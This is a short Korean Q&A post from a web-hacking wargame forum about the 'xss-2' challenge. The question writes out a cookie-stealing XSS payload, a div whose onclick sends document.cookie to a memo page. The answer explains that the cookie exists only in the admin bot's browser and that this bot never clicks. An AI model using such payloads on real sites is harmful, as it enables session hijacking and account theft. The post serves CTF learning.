문제 접근 질문
http://host2.dreamhack.games:21402/vuln?param=<div onclick =location.href="/memo?memo="+document.cookie;>Here</div>
로 작성하면 memo페이지로 이동하고 여백이 출력됩니다.
뭐가 문제일까요??
#web
답변
1
Pocas
워게임 고인물
현재 브라우저에 쿠키가 없기 때문입니당. 관리자 봇으로 보내시면 쿠키를 탈취하실 수 있습니다. 하지만 위 페이로드를 사용할 경우에 관리자 봇에서 클릭 이벤트가 있어야 하는데, xss-2 문제의 관리자 봇에는 클릭 이벤트가 없기 때문에 위 페이로드로는 쿠키를 탈취하실 수 없습니당.
질문에 대한 답을 알고 계신가요?
지식을 나누고 포인트를 획득해보세요.
답변하고 포인트 받기 지식을 나누고 포인트를 획득해보세요.
